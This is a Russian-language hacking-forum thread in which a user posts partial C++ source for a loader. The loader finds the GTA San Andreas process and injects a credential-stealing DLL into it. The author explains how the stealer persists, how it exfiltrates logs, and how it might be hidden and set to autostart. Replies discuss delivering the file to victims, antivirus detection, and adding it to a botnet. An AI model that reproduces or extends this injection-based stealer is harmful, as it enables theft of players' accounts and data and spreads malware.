HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.05.2019, 20:13
Vadim.dll
Участник форума
Регистрация: 04.07.2015
Сообщений: 168
С нами: 5715860

Репутация: 78
По умолчанию

Тема создана в целях познания. Делал чисто из-за того, чтобы получить опыт.

Сделал .exe загрузчик стиллера, который следит за процессом гта са и если таковой имеется, вшивает туда стиллер.

C++:





[CODE]
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//Library needed by Linker to check file existance
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "WinInet.lib")
#pragma comment (lib, "urlmon.lib")
using
namespace
std
;
DWORD
GetProcId
(
const
wchar_t
*
procname
)
{
PROCESSENTRY32 pe
;
HANDLE hSnap
;
pe
.
dwSize
=
sizeof
(
PROCESSENTRY32
)
;
hSnap
=
CreateToolhelp32Snapshot
(
TH32CS_SNAPPROCESS
,
NULL
)
;
if
(
Process32First
(
hSnap
,
&
pe
)
)
{
do
{
if
(
wcscmp
(
pe
.
szExeFile
,
procname
)
==
0
)
return
pe
.
th32ProcessID
;
;
}
while
(
Process32Next
(
hSnap
,
&
pe
)
)
;
}
return
(
DWORD
)
0
;
}
bool
InjectDLL
(
const
int
&
pid
,
const
string
&
DLL_Path
)
{
long
dll_size
=
DLL_Path
.
length
(
)
+
1
;
HANDLE hProc
=
OpenProcess
(
PROCESS_ALL_ACCESS
,
FALSE
,
pid
)
;
if
(
hProc
==
NULL
)
{
cerr



Палится антистиллером от даркпискеля. Плюсы здесь в том, что стиллер работает на чистой gta_sa без всяких asi_loader, sampfuncs. Еще плюс в том, что если юзер снесет гта и поставит заново, стиллер продолжит работать. Плюс отправляет логи уже после того, как юзер закрывает гта. Также модернизировал немного паблик аси стиллер, чтобы логи складировал в txt файл и удалил лишнюю шнягу. Исходники тоже могу скинуть, кому интересно. Работает на R1/R2. Для R3 оффсеты не смог извлечь из игры т.к я баран.

P.S Не мешало бы доделать, чтобы он прятался тоже где-то в temp папке и сам себя добавил в автозагрузку

P.S.S И вообще, можно ведь сделать .exe стиллер не вшивая .asi стиллер в игру, а напрямую взаимодействуя с процессом

Вопрос к знающим, если я записываю путь к temp папке в char, а не WCHAR, значит ли это, что если у юзера в пути к temp папке содержатся русские символы, то будет беда?
 
Ответить с цитированием

  #2  
Старый 09.05.2019, 21:10
ImPasha
Познавший АНТИЧАТ
Регистрация: 28.10.2017
Сообщений: 1,778
С нами: 4495573

Репутация: 183


По умолчанию

Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo

Кстати, rghost заблокирован в России. Файл не будет загружаться.
 
Ответить с цитированием

  #3  
Старый 09.05.2019, 21:20
Vadim.dll
Участник форума
Регистрация: 04.07.2015
Сообщений: 168
С нами: 5715860

Репутация: 78
По умолчанию

Цитата:
Сообщение от Pakulichev  

Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться.
это прототип, логирование для дебага
 
Ответить с цитированием

  #4  
Старый 09.05.2019, 22:16
suic1de666
Познающий
Регистрация: 04.11.2016
Сообщений: 79
С нами: 5011096

Репутация: 68
По умолчанию

Нормас, добавлю в свой ботнет
 
Ответить с цитированием

  #5  
Старый 09.05.2019, 22:42
osminog
Познающий
Регистрация: 19.01.2019
Сообщений: 87
С нами: 3850426

Репутация: 0
По умолчанию

Цитата:
Сообщение от Pakulichev  

Не сильно разбираюсь в C++, но всё-таки мне стало интересно, зачем нужно логирование через coutroflanebalo
Кстати, rghost заблокирован в России. Файл не будет загружаться.
VPN в помощь
 
Ответить с цитированием

  #6  
Старый 09.05.2019, 22:44
ImPasha
Познавший АНТИЧАТ
Регистрация: 28.10.2017
Сообщений: 1,778
С нами: 4495573

Репутация: 183


По умолчанию

Цитата:
Сообщение от osminog  

VPN в помощь
Я про то, что жертва не сможет скачать файл
 
Ответить с цитированием

  #7  
Старый 09.05.2019, 22:49
Vadim.dll
Участник форума
Регистрация: 04.07.2015
Сообщений: 168
С нами: 5715860

Репутация: 78
По умолчанию

Цитата:
Сообщение от Pakulichev  

Я про то, что жертва не сможет скачать файл
Тут не обязательно юзать rghost, можешь хоть со своего сервака грузить
 
Ответить с цитированием

  #8  
Старый 09.05.2019, 23:05
atizoff
Познавший АНТИЧАТ
Регистрация: 02.08.2018
Сообщений: 1,295
С нами: 4095395

Репутация: 183


По умолчанию

вирустотал ахуевает от этого?
 
Ответить с цитированием

  #9  
Старый 09.05.2019, 23:15
ALF
Постоянный
Регистрация: 14.11.2017
Сообщений: 319
С нами: 4472205

Репутация: 163
По умолчанию

Цитата:
Сообщение от social enemy  

вирустотал ахуевает от этого?
вирус тотал будет от любого файла ахуевать... если юзеры будут лить их туда

в теме ошибка, это не exe стиллер, а лоадер.
 
Ответить с цитированием

  #10  
Старый 09.05.2019, 23:17
atizoff
Познавший АНТИЧАТ
Регистрация: 02.08.2018
Сообщений: 1,295
С нами: 4095395

Репутация: 183


По умолчанию

Цитата:
Сообщение от ALF  

вирус тотал будет от любого файла ахуевать... если юзеры будут лить их туда

в теме ошибка, это не exe стиллер, а лоадер.
ну не напишет же читу он stealler
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...